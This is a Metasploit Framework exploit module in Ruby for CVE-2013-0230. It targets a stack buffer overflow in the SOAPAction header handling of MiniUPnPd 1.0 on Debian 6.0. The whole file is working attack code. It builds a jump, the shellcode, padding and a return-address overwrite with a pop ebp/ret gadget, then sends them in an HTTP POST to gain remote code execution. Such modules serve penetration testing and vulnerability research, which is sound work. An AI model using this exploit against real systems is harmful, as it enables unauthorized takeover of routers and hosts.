##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#	 http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::HttpClient
	Rank = NormalRanking

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
			'Description'    => %q{
					This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
				present in the SOAPAction HTTP header handling.
			},
			'Author'         =>
				[
					'hdm', # Vulnerability discovery
					'Dejan Lukan' # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'DefaultOptions' => { 'EXITFUNC' => 'process', },
			# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
			# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
			# of the program is never reached)
			'Payload'        =>
				{
					'Space' => 2060,
					'BadChars' => "\x00\x22",
					'DisableNops' => true
				},
			'Platform'       => 'linux',
			'References'     =>
				[
					[ 'CVE', '2013-0230' ],
					[ 'OSVDB', '89624' ],
					[ 'BID', '57608' ],
					[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
				],
			'Targets'        =>
				[
					[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
						{
							'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
							'Offset' => 2123
						}
					],
				],
			'DefaultTarget'  => 0,
			'Privileged'     => false,
			'DisclosureDate' => 'Mar 27 2013',
		))

		register_options([
			Opt::RPORT(5555),
		], self.class)
	end

	def exploit
		#
		# Build the SOAP Exploit
		#
		# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
		sploit	= "\xeb\x2d"

		# a valid action
		sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"

		# payload
		sploit += payload.encoded

		# nops
		sploit += rand_text(target['Offset'] - sploit.length - 16)

		# overwrite registers on stack: the values are not used, so we can overwrite them with anything
		sploit += rand_text(4)		 # overwrite EBX
		sploit += rand_text(4)		 # overwrite ESI
		sploit += rand_text(4)		 # overwrite EDI
		sploit += rand_text(4)		 # overwrite EBP

		# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
		# stack points directly to the string after 'Soapaction: ', which is why we must
		# throw the first value on the stack away, which we're doing with the pop ebp
		# instruction. Then we're returning to the next value on the stack, which is
		# exactly the address that we want.
		sploit += [target.ret].pack('V')

		# the ending " character is necessary for the vulnerability to be reached
		sploit += "\""

		# data sent in the POST body
		data =
			"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
			"<SOAP-ENV:Envelope\r\n" +
			"	SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
			"	xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
			"	xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
			">\r\n" +
			"<SOAP-ENV:Body>\r\n" +
			"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
			"</ns1:action>\r\n" +
			"</SOAP-ENV:Body>\r\n" +
			"</SOAP-ENV:Envelope>\r\n"

		#
		# Build and send the HTTP request
		#
		print_status("Sending exploit to victim #{target.name} at ...")
		send_request_cgi({
			'method'	=> 'POST',
			'uri'		 => "/",
			'headers' => {
				'SOAPAction' => sploit,
			},
			'data'		=> data,
		})

		# disconnect from the server
		disconnect
	end
end